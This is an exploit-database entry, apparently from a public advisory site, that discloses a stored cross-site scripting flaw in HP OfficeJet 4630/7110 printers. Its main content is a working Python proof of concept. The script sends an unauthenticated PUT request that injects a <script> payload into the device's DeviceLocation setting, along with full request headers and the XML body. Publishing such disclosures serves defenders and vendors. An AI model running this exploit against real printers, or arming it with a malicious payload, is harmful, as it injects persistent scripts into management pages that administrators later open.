HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting

2021.08.25
Credit: Tyler Butler
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS) # Date: 01/08/2021 # Exploit Author: Tyler Butler # Vendor Homepage: https://www8.hp.com/ # Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742 # Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630 # Version: HP OfficeJet 7110 Wide Format ePrinter # Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A # PoC: import requests import json from requests.exceptions import HTTPError target = 'http://192.168.223.1' # The IP of the vulnerable taget payload = '''<script>alert('XSS');</script>''' # The XSS injection payload you want to use path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command pre = ''' <?xml version="1.0" encoding="UTF-8"?> <!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. --> <prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"> <prdcfgdyn2:ProductSettings> <prdcfgdyn:DeviceInformation> <dd:DeviceLocation> ''' # The start of the request body post = ''' </dd:DeviceLocation> </prdcfgdyn:DeviceInformation> </prdcfgdyn2:ProductSettings> </prdcfgdyn2:ProductConfigDyn> ''' # The end of the request body body = pre + payload + post headers = { 'Host':'192.168.223.1', 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0', 'Accept':'*/*', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'text/xml', 'Content-Length':str(len(body.encode('utf-8'))), 'Origin':'https://192.168.223.1', 'Connection':'close', 'Referer':target, } print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90') try: print('{!} Injecting payload :',payload) response = requests.put(target+path, headers = headers, data = body) response.raise_for_status() except HTTPError as http_err: print('{X}',f'HTTP error occurred: {http_err}') except Exception as err: print('{X}',f'Other error occurred: {err}') else: print('{!} Success!')


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top